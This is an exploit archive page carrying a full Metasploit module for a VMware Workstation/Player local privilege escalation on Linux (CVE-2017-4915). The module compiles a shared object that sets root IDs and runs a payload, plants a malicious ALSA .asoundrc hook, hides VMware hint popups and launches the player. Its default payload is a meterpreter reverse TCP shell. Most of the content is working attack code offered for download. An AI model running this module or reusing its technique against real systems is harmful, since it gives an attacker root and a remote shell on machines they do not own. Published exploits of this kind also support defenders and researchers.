what you don't know can hurt you

VMware Workstation ALSA Config File Local Privilege Escalation

VMware Workstation ALSA Config File Local Privilege Escalation
Posted Jan 5, 2018
Authored by Brendan Coles, Jann Horn | Site metasploit.com

This Metasploit module exploits a vulnerability in VMware Workstation Pro and Player on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card. This Metasploit module has been tested successfully on VMware Player version 12.5.0 on Debian Linux.

tags | exploit, root
systems | linux, debian
advisories | CVE-2017-4915
MD5 | f3b6448b87cca47f57a97189ff144abb

VMware Workstation ALSA Config File Local Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'VMware Workstation ALSA Config File Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in VMware Workstation Pro and
Player on Linux which allows users to escalate their privileges by
using an ALSA configuration file to load and execute a shared object
as root when launching a virtual machine with an attached sound card.

This module has been tested successfully on VMware Player version
12.5.0 on Debian Linux.
},
'References' =>
[
[ 'CVE', '2017-4915' ],
[ 'EDB', '42045' ],
[ 'BID', '98566' ],
[ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
],
'License' => MSF_LICENSE,
'Author' =>
[
'Jann Horn', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'DisclosureDate' => 'May 22 2017',
'Platform' => 'linux',
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' =>
{
'Payload' => 'linux/x64/meterpreter_reverse_tcp',
'WfsDelay' => 30,
'PrependFork' => true
},
'DefaultTarget' => 1,
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Privileged' => true ))
register_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def has_prereqs?
vmplayer = cmd_exec 'which vmplayer'
if vmplayer.include? 'vmplayer'
vprint_good 'vmplayer is installed'
else
print_error 'vmplayer is not installed. Exploitation will fail.'
return false
end

gcc = cmd_exec 'which gcc'
if gcc.include? 'gcc'
vprint_good 'gcc is installed'
else
print_error 'gcc is not installed. Compiling will fail.'
return false
end

true
end

def check
unless has_prereqs?
print_error 'Target missing prerequisites'
return CheckCode::Safe
end

begin
config = read_file '/etc/vmware/config'
rescue
config = ''
end

if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
@version = Gem::Version.new $1.gsub(/\.$/, '')
vprint_status "VMware is version #{@version}"
else
print_error "Could not determine VMware version."
return CheckCode::Unknown
end

if @version < Gem::Version.new('12.5.6')
print_good 'Target version is vulnerable'
return CheckCode::Vulnerable
end

print_error 'Target version is not vulnerable'
CheckCode::Safe
end

def exploit
if check == CheckCode::Safe
print_error 'Target machine is not vulnerable'
return
end

@home_dir = cmd_exec 'echo ${HOME}'
unless @home_dir
print_error "Could not find user's home directory"
return
end
@prefs_file = "#{@home_dir}/.vmware/preferences"

fname = ".#{rand_text_alphanumeric rand(10) + 5}"
@base_dir = "#{datastore['WritableDir']}/#{fname}"
cmd_exec "mkdir #{@base_dir}"

so = %Q^
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
Original shared object code by jhorn
*/

#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>

extern char *program_invocation_short_name;

__attribute__((constructor)) void run(void) {
uid_t ruid, euid, suid;
if (getresuid(&ruid, &euid, &suid))
err(1, "getresuid");
if (ruid == 0 || euid == 0 || suid == 0) {
if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
err(1, "setresxid");
system("#{@base_dir}/#{fname}.elf");
_exit(0);
}
}
^
vprint_status "Writing #{@base_dir}/#{fname}.c"
write_file "#{@base_dir}/#{fname}.c", so

vprint_status "Compiling #{@base_dir}/#{fname}.o"
output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
unless output == ''
print_error "Compilation failed: #{output}"
return
end

vmx = %Q|
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "8"
scsi0.present = "FALSE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "FALSE"
hpet0.present = "FALSE"
displayName = "#{fname}"
guestOS = "other"
nvram = "#{fname}.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
monitor_control.disable_longmode = 1
|
vprint_status "Writing #{@base_dir}/#{fname}.vmx"
write_file "#{@base_dir}/#{fname}.vmx", vmx

vprint_status "Writing #{@base_dir}/#{fname}.elf"
write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe

vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"

asoundrc = %Q|
hook_func.pulse_load_if_running {
lib "#{@base_dir}/#{fname}.so"
func "conf_pulse_hook_load_if_running"
}
|
vprint_status "Writing #{@home_dir}/.asoundrc"
write_file "#{@home_dir}/.asoundrc", asoundrc

vprint_status 'Disabling VMware hint popups'
unless directory? "#{@home_dir}/.vmware"
cmd_exec "mkdir #{@home_dir}/.vmware"
@remove_prefs_dir = true
end

if file? @prefs_file
begin
prefs = read_file @prefs_file
rescue
prefs = ''
end
end

if prefs.blank?
prefs = ".encoding = \"UTF8\"\n"
prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
prefs << "hints.hideAll = \"TRUE\"\n"
@remove_prefs_file = true
elsif prefs =~ /hints\.hideAll/i
prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
else
prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
end
vprint_status "Writing #{@prefs_file}"
write_file "#{@prefs_file}", prefs

print_status 'Launching VMware Player...'
cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
end

def cleanup
print_status "Removing #{@base_dir} directory"
cmd_exec "rm '#{@base_dir}' -rf"

print_status "Removing #{@home_dir}/.asoundrc"
cmd_exec "rm '#{@home_dir}/.asoundrc'"

if @remove_prefs_dir
print_status "Removing #{@home_dir}/.vmware directory"
cmd_exec "rm '#{@home_dir}/.vmware' -rf"
elsif @remove_prefs_file
print_status "Removing #{@prefs_file}"
cmd_exec "rm '#{@prefs_file}' -rf"
end
end

def on_new_session(session)
# if we don't /bin/sh here, our payload times out
session.shell_command_token '/bin/sh'
super
end
end
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close